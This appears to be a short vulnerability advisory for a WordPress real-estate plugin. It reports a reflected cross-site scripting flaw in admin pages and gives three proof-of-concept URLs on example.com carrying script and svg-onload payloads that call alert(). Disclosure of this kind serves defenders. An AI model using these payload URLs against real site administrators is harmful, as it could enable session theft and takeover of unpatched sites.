Description The plugin does not sanitise and escape various parameters and generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin
Make a logged in admin open one of the URLs below (some require that at least one property exist in the plugin):
https://example.com/wp-admin/edit.php?post_type=properties&"><script>alert`XSS`</script>
https://example.com/wp-admin/edit.php?post_type=properties&order="><svg/onload=alert(/XSS/)> (other affected parameter: orderby)
https://example.com/wp-admin/admin.php?page=es_demo&"><script>alert`XSS`</script>